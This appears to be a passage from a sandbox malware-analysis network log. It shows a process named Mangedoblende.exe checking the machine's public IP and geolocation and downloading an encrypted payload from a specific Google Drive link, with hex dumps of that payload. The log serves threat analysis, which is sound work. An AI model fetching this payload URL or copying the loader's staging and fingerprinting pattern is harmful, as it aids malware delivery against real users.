Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49989 | 193.122.6.168 | 80 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:17:38.067591906 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:17:39.408058882 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:39 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49991 | 193.122.6.168 | 80 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:17:40.031338930 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:17:41.878340006 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:41 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49993 | 193.122.6.168 | 80 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:17:42.517492056 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:17:44.143934965 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:44 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49995 | 193.122.6.168 | 80 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:17:44.802400112 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:17:45.442804098 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:45 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49905 | 142.250.185.174 | 443 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:17:25 UTC | 216 | OUT | GET /uc?export=download&id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache
2025-01-10 18:17:25 UTC | 1920 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 10 Jan 2025 18:17:25 GMT
Location: https://drive.usercontent.google.com/download?id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'nonce-8yY5ZUCLhXowobbN1FBPtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49916 | 216.58.212.161 | 443 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:17:26 UTC | 258 | OUT | GET /download?id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2025-01-10 18:17:29 UTC | 4953 | IN | HTTP/1.1 200 OK
X-GUploader-UploadID: AFIdbgQko23X_r4Gvj6wUtogHpqa2A9AGfpCW0H15-gV_g8wqBhLt0DjGN6bHC-VPUlEqpgWXL4QaEc
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="oKVNWFJlyyYUXQMrMwnVOnlW8.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 277056
Last-Modified: Tue, 17 Dec 2024 11:04:56 GMT
Date: Fri, 10 Jan 2025 18:17:29 GMT
Expires: Fri, 10 Jan 2025 18:17:29 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=HotvgQ==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2025-01-10 18:17:29 UTC | 4953 | IN | Data Raw: 9b 05 27 cc 72 98 aa 60 a7 1b 10 5c 31 f5 0f 7c 36 d1 95 5b f7 e4 b2 bc 22 9d b1 5b 2f e4 41 2c 28 5a 99 e7 3e ed 62 00 c5 4b c6 84 77 aa f9 76 d2 bd 54 2e ad 55 36 b1 21 4f 9e 7f e6 0b a4 91 10 2f 42 4c 2f f7 df 32 09 da 9b bb ce 16 81 75 a7 94 f2 1c 01 c3 6e bb f4 59 62 b0 e4 21 b9 16 35 96 dc c5 31 06 ed 87 6c 5a bd 9a 77 b6 86 44 7e c2 60 df 44 50 4d 1e f9 0d 4f eb 78 a2 fb dc 22 18 3e db f1 a8 cd 21 c8 cf 41 20 fd 09 81 cb 18 96 84 e5 a5 10 af 33 50 7c c0 da 33 0c 69 24 f1 b9 39 a0 a9 37 53 eb 67 52 d0 79 dd 02 9d 62 a9 8c 82 5f 99 ee 50 7e 55 af 9c c3 68 3e da 99 d3 f0 76 d7 16 55 72 fe f0 87 f6 e6 79 1f 8b c7 12 73 44 af 6d 6b 12 c1 40 03 4a 3a 38 4a 2d 68 73 e3 b7 05 77 7b 9f 58 32 cc 8b 92 86 ad 3f f1 f6 a6 ed 9c a7 c1 eb 2e e4 31 e3 55 01 41 e6
Data Ascii: 'r`\1|6["[/A,(Z>bKwvT.U6!O/BL/2unYb!51lZwD~`DPMOx">!A 3P|3i$97SgRyb_P~Uh>vUrysDmk@J:8J-hsw{X2?.1UA
2025-01-10 18:17:29 UTC | 4793 | IN | Data Raw: 7f 95 38 4a 61 90 3f 26 b8 2b b3 3f 33 d3 2b 98 88 f0 b5 1a 2f 81 cc f0 de 75 3e 9a e0 82 f9 5e 83 45 de e0 98 87 99 76 f3 e9 89 28 ae 6e c5 e1 64 cc 32 91 d4 c7 14 3b 0b 2a 41 db 96 51 57 67 70 6b 10 a9 ac 2b ca c4 c1 66 54 af 4a f8 3e b6 86 34 20 7e 77 6f 9f d4 41 76 00 ce 39 37 ce d5 09 7f f5 e3 6b ab e0 8b b9 d1 19 24 dc 2d 88 9d 29 9a 00 71 96 a9 1c a6 69 4c 84 7d 27 d0 15 e3 51 2f 50 a4 4c 03 9e 06 1b 92 ba f6 55 cc 33 cf 5f 04 8f 07 ad 42 65 0a 74 eb 6b 7c b1 e2 16 c4 94 e9 04 41 36 08 fb a7 3f b3 4c 8f 55 ff db aa 16 45 77 33 9a fc 91 15 41 a1 15 c7 d9 bd 98 46 a7 67 b0 6c b0 7a ed a5 45 82 46 43 88 9a 4e 35 0d 93 0a 58 19 d0 90 ee d1 6e 50 65 62 5c b1 d8 22 85 bf 51 3d c8 ae 59 5e 7f db 73 33 5f ce f7 de ac 9a 57 53 c4 6c 19 1d de c0 3a 49 aa ab
Data Ascii: 8Ja?&+?3+/u>^Ev(nd2;*AQWgpk+fTJ>4 ~woAv97k$-)qiL}'Q/PLU3_Betk|A6?LUEw3AFglzEFCN5XnPeb\"Q=Y^s3_WSl:I
2025-01-10 18:17:29 UTC | 1323 | IN | Data Raw: e3 a1 97 9a 88 d3 82 8f ba d2 11 42 93 22 3a 42 ef 13 b5 93 6f 46 1e 01 a7 18 69 a5 b8 18 66 e6 f1 96 3d 50 b6 e6 30 1b 11 ee 06 86 5c 98 07 02 28 0c 6e 14 0b 06 cd 54 c5 75 28 39 98 2c 67 ee 52 7a e0 ad 32 16 9d 69 68 df e4 45 89 c2 96 41 be c9 49 64 9e e8 08 b6 98 0e 5a ac 60 42 8b 76 34 96 f1 57 f8 26 f8 0b e4 15 68 35 e5 d4 9a fe a2 e7 14 f0 13 49 6a d7 f3 1a 68 88 1c 0f fc 0a 5c 49 3b a1 2f 3b cf 0a 00 f9 de 45 0d 6a 98 5e 0a d3 6a 38 12 f0 53 70 b3 ba e6 0c 5e 82 db 20 4f aa e5 51 43 5a 5d 2b 7e 87 19 4d 0f 6a a2 d9 03 ba d7 35 54 ac d0 dc 65 37 84 70 26 f0 4f 23 d0 d2 3d a8 fb 01 3d 7a d3 71 da 13 f3 73 8e b9 9e 61 ce 71 50 57 a1 7e bc c1 92 ea 3f eb 61 0a 42 21 6b 4c 01 04 7c 85 51 52 7b 82 60 fa 7b b3 01 0c e0 e8 4e 18 9a 74 a5 bc 5f af f2 d2 3a
Data Ascii: B":BoFif=P0\(nTu(9,gRz2ihEAIdZ`Bv4W&h5Ijh\I;/;Ej^j8Sp^ OQCZ]+~Mj5Te7p&O#==zqsaqPW~?aB!kL|QR{`{Nt_:
2025-01-10 18:17:29 UTC | 1390 | IN | Data Raw: 7f 04 81 ce 33 3e b7 77 08 6c df 9d 2f 92 2e 81 b9 d6 2e 6e 51 72 82 80 a5 b5 65 71 97 86 0a d3 23 2c e2 0d 85 ff 05 a4 82 2f 50 a4 81 4e 86 74 76 91 ba f5 9e e9 2a bb 74 00 8f 12 0b 6f 68 0b 95 e4 6b 06 00 c2 0d ab bb 9a 6f 45 94 27 f4 d3 b7 ba 4e 90 9b d7 ae a0 16 91 16 6f 8b fa b7 0e 71 bc f7 86 d9 bd 93 63 6d 04 47 11 dd 0a 4f 8a 5f 74 fc 43 99 95 c0 18 04 e4 02 56 19 a0 38 cb 14 ce 66 65 73 5c 3f f5 29 f3 e1 53 3d b8 06 71 f7 76 f3 17 20 7d d2 d5 76 a0 9a 5a 7f e3 6b 7a 1c de e8 47 49 76 a7 38 de 25 94 fe 76 80 5d e2 69 aa 63 da 19 06 8b 0f e3 7b b1 d3 99 d7 a4 96 89 a8 3e 43 93 26 18 7c 33 cd a0 b6 99 62 3b 29 99 0b 6c af 83 59 66 ce 99 4b 63 5c 68 e6 30 1b 11 ee 03 86 5c 98 07 02 28 0c 6e 14 0b 06 cd 54 c5 75 28 39 98 0e 67 cc 47 e5 ff 20 72 68 b2
Data Ascii: 3>wl/..nQreq#,/PNtv*tohkoE'NoqcmGO_tCV8fes\?)S=qv }vZkzGIv8%v]ic{>C&|3b;)lYfKc\h0\(nTu(9gG rh
2025-01-10 18:17:29 UTC | 1390 | IN | Data Raw: 54 1d 9d 58 69 9d c6 3e 1d 4f 48 11 fb 3e 0a 9a b7 b3 2c e4 ef 5e 24 b6 ce 44 86 d0 91 0d 68 28 7d 10 32 17 c2 b9 2b b9 5e fb d3 2b 92 88 8e 9e 18 2f 85 bf b0 df 75 34 92 e7 93 ff f9 53 45 de e4 89 80 f6 a5 f3 e9 83 28 d0 52 c5 e0 60 bf fb 46 d5 cd 07 eb 74 1b 41 cb 92 23 c2 20 70 1b 07 9a 1d 28 ca 7f d7 98 55 af 43 e9 26 9a 8a 0d 4b 69 18 af 94 d3 63 2c 00 e5 38 34 b0 81 1f 10 35 8c 0f a1 e0 81 a8 de 78 0a 51 72 8c b5 e3 f5 65 7b f9 6f 1c a1 64 23 f3 75 59 e0 12 8c 32 51 6b ae 23 6f ed ba 11 9e b0 ea f1 cc 33 cf 4c 11 87 07 af 25 bc 79 1e e1 6b 67 a4 88 d9 d5 91 90 6f 69 52 02 e8 a7 2e 6b 5e c5 11 cb db a0 1c 88 73 33 a3 98 bd 1d 5a 79 7a c6 d9 bd ec 73 7b 76 b0 71 48 78 ed df 5e 74 c9 43 99 95 74 c3 1d 85 6e 48 12 e9 51 ef 0d b0 20 4e 73 58 99 f8 d8 81
Data Ascii: TXi>OH>,^$Dh(}2+^+/u4SE(R`FtA# p(UC&Kic,845xQre{od#uY2Qk#o3L%ykgoiR.k^s3Zyzs{vqHx^tCtnHQ NsX
2025-01-10 18:17:29 UTC | 1390 | IN | Data Raw: a6 79 5a d8 e8 76 6b b5 40 20 ab de 1f 58 bd 53 dc 5c cb ce 8f 6f 0b b2 bf c5 70 9b d6 1b da 14 b5 9e 83 30 12 60 1f e0 7c e4 0e 8b c7 78 37 9a c7 e6 f1 12 7d 12 4c f9 f3 2b cb 02 6b 30 a8 77 af d1 ac 35 86 11 16 67 ac 64 29 37 2b e0 2f 80 3a e2 27 d4 3a 39 fd 26 0e 9f b6 42 3c 00 09 58 84 36 63 00 28 6c 56 ad 65 ce 4b 1f 75 0d 1e bc 54 47 c9 aa af 54 6d 35 0f 59 a0 72 4e 35 1e ea 34 e9 32 26 95 b7 c7 a6 8b f6 20 16 c8 d1 40 24 f1 a3 35 95 38 77 c2 84 2b a3 91 91 b3 31 39 a7 a8 98 88 f1 b9 18 27 f3 a5 4d df 05 51 3a e0 82 f3 96 8a 3b 9c ee 98 83 e7 35 f3 e9 8d 5b 12 6e c5 ea 0b 71 32 46 df c7 3c b9 0a 2a 4b d6 1b 11 57 22 71 4e 07 c0 87 3d ca 05 63 43 43 94 fe f8 2f bc 24 39 5b 0c 10 6a 94 a3 cb 09 19 b0 0b 34 a1 8d ab 5a e5 fe 84 a4 e0 f1 1b f3 1d 4a 4d
Data Ascii: yZvk@ XS\op0`|x7}L+k0w5gd)7+/:':9&B<X6c(lVeKuTGTm5YrN542& @$58w+19'MQ:;5[nq2F<*KW"qN=cCC/$9[j4ZJM
2025-01-10 18:17:29 UTC | 1390 | IN | Data Raw: 20 af 42 f6 34 ce 42 ce f0 fc 2b ad 90 f4 74 71 a5 8f df 79 22 b5 e2 83 b5 7c c4 47 45 6d 91 82 02 66 8a 79 0e 91 a8 b8 73 44 a5 8d 7a 0b af 90 02 1a 30 38 6e 11 ab 73 f7 b7 05 77 6d b7 2e 0c 8f 85 92 a6 8d 33 f1 f6 ee 9e 9c a7 cb ab 32 69 51 e3 55 00 66 f0 3e d3 52 2e 5c ac 16 cb 0c ff bc 30 74 13 f6 28 eb 3d 3e f9 9c 6f 61 92 fc 73 f9 a3 f0 53 94 58 5c 43 ac a2 7e 61 9a e2 03 9b b7 38 43 bd e7 79 79 d0 f5 02 2f 1a b2 c0 fc 66 e9 4b 64 34 64 17 b1 e6 42 a7 60 6f fc f6 40 16 f9 5c 7b c9 e9 6f c5 d1 98 ce 12 4c 8d 62 0e d1 74 6a b7 aa 07 7d ef f1 b4 86 1b be 59 27 65 22 3a 01 da 5c 59 2f f6 87 ff 25 39 fc 0a 0b d6 b6 48 44 59 de 4a f4 51 c6 41 28 6c 51 99 6d a1 1b 37 31 09 36 be 54 9a 4e c4 16 54 48 17 49 7e b5 78 2d 02 45 c2 56 e3 4c 67 4b b7 c3 8e c1 f6
Data Ascii: B4B+tqy"|GEmfysDz08nswm.32iQUf>R.\0t(=>oasSX\C~a8Cyy/fKd4dB`o@\{oLbtj}Y'e":\Y/%9HDYJQA(lQm716TNTHI~x-EVLgK
2025-01-10 18:17:29 UTC | 1390 | IN | Data Raw: f6 0e 2f e7 36 4f ff e3 a4 40 25 95 32 2b d2 4c 26 f7 d6 5d a7 da 9b b1 31 37 8d 75 16 b8 f5 15 6e c2 6e bb be 59 be 6e f7 04 91 22 35 96 d6 d6 35 06 c5 e5 6c 5a b7 47 14 b0 86 44 7e c2 60 a1 76 50 4d 1a 8b 98 4d eb 88 b4 d3 5d 2c 07 8e c3 0f 1d d7 e9 f8 72 79 a6 32 28 d5 dd 5e e5 a4 91 a5 0c d8 41 41 07 c8 38 52 62 0d 5d 7b 98 48 c3 98 43 1f b5 46 3b be 59 8d b3 c8 7f c4 e3 e0 49 77 e3 5d 7e 59 6e 9c c3 62 3e a9 5b 83 b5 7c c4 5d 45 76 80 13 02 66 84 0a dc 8b c7 18 1c 80 af 8d 61 10 d1 4c 6d df 3a 38 64 57 55 73 f7 b3 6a b1 7b 9f 52 0c 9e 88 e0 1f 9d 3f 81 de 72 e9 9c ad b3 04 3e e4 61 cb 0e 01 43 ec 23 b2 59 2e 26 84 46 cc 11 74 5e 15 63 6c 96 3e 99 02 8a dc f4 bf af 94 d4 b7 d1 e3 fa f1 b7 e2 0b 3d dd e4 0e c3 bb 59 58 b9 c5 2f 55 1f b2 c1 2e fa ed 8f
Data Ascii: /6O@%2+L&]17unnYn"55lZGD~`vPMM],ry2(^AA8Rb]{HCF;YIw]~Ynb>[|]EvfaLm:8dWUsj{R?r>aC#Y.&Ft^cl>=YX/U.
2025-01-10 18:17:29 UTC | 1390 | IN | Data Raw: ea 50 6a fc 8b 6d 5d ef 32 b8 0d 48 2c 18 9a 38 0e 54 6c 72 41 90 59 5f 1c e1 19 df 12 79 38 4a 5c 0a e9 93 cf 74 66 72 ca f1 b7 f2 37 c1 57 34 0d 7f 56 1f 70 f2 4a c4 05 0e 40 5a f4 60 c3 e8 d9 14 42 13 c7 6a e3 69 11 65 e8 a3 96 9d af e6 1c 3c 80 30 5e 63 da 17 2b 6f bb 6a 2c b3 7c e0 9a 90 39 d6 7b a7 cd 6f 69 86 87 6a 5f a7 22 99 5d 5e c7 7d 8f 93 b1 0f e7 30 42 f6 c3 c5 48 ab f6 5d 75 ac 73 2c f7 db 23 2f a8 e2 ac 31 99 ff 6a 1f 94 f6 34 48 c3 6e b1 a5 7a 1c f0 e4 21 bd 3e 0b 96 dc c3 31 d8 fd a2 44 6e bd 9a 7d a5 a2 44 56 a0 60 df 4e 8e 4d 1e f9 0d 31 dc f8 a2 ff ae b9 05 84 a5 e7 34 45 ec e9 7d 56 92 31 3b f0 b2 54 c9 f8 88 5a 3f c8 41 30 34 f6 cb 69 74 07 3b 27 bc 4c ed 3d 45 26 8f e5 1e a6 2b fe 42 ce 32 66 c6 ff 44 8f e3 5d 70 d3 8a 86 b1 59 3d
Data Ascii: Pjm]2H,8TlrAY_y8J\tfr7W4VpJ@Z`Bjie<0^c+oj,|9{oij_"]^}0BH]us,#/1j4Hnz!>1Dn}DV`NM14E}V1;TZ?A04it;'L=E&+B2fD]pY=
2025-01-10 18:17:29 UTC | 1390 | IN | Data Raw: c6 52 a4 a5 28 67 60 ea e5 98 b1 29 6e 9f a2 19 59 12 9f a4 a8 73 bd 52 77 1b 56 03 09 a5 8a 0c 7a 00 eb 84 8d 2e 71 31 02 e7 20 5e a4 6a 63 81 d1 90 88 78 e2 8b 6b d6 4c e5 a6 87 34 20 f8 91 63 92 2a ba 50 9c 24 7e c8 55 b1 66 57 aa 32 61 d3 f8 23 28 37 ab f7 97 85 df 76 d4 ea a8 25 f4 ea 2a 61 ba 24 a2 2d 83 42 ae 5e fd 20 65 eb 3a e6 58 a6 e2 54 23 68 fb d4 bf 67 ff c0 39 d9 6a 6f 4e 68 38 17 c9 2a 54 72 41 94 fb 04 33 93 28 d8 60 9c 98 6f 37 62 e1 12 cf 70 ce 41 28 82 e3 f0 26 a5 cc e7 79 7f 56 08 92 ee 4a c4 0e 38 74 33 42 36 c3 98 7a 14 43 49 2a 7d e3 13 11 65 e7 f9 45 92 af 9c 1c 3c 81 3c 01 6c da 63 2b 6f b8 66 25 b0 7c 94 9a 90 38 da 6a a4 cd 1b 69 8b ee 18 18 bb 31 ca e9 5e c4 7d 8f 93 a2 3a 99 0a 42 f6 ef c0 79 ba fc 2d 63 fa cd 2c f7 d5 24 f3
Data Ascii: R(g`)nYsRwVz.q1 ^jcxkL4 c*P$~UfW2a#(7v%*a$-B^ e:XT#hg9joNh8*TrA3(`o7bpA(&yVJ8t3B6zCI*}eE<<lc+of%|8ji1^}:By-c,$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49947 | 104.21.96.1 | 443 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:17:31 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 18:17:32 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:32 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1847841
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fpsUJ%2BzJmzCHgkkF4XD%2FxxmcbU%2BqvKY%2BFKhDOK0GKqG9NoXQGLqSeg7oLivFgu6KNyn3me55la5xHl9xvGPcc2jTQyxUqxZlZZnJa9hCxjgtDHrc7cjoN5yJHdueidvMt8JNDUmd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffeaa171c1f42c0-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1600&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1777236&cwnd=212&unsent_bytes=0&cid=d6a9d8c07dac082e&ts=160&x=0"
2025-01-10 18:17:32 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49955 | 104.21.96.1 | 443 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
Timestamp | Bytes transferred | Direction | Data
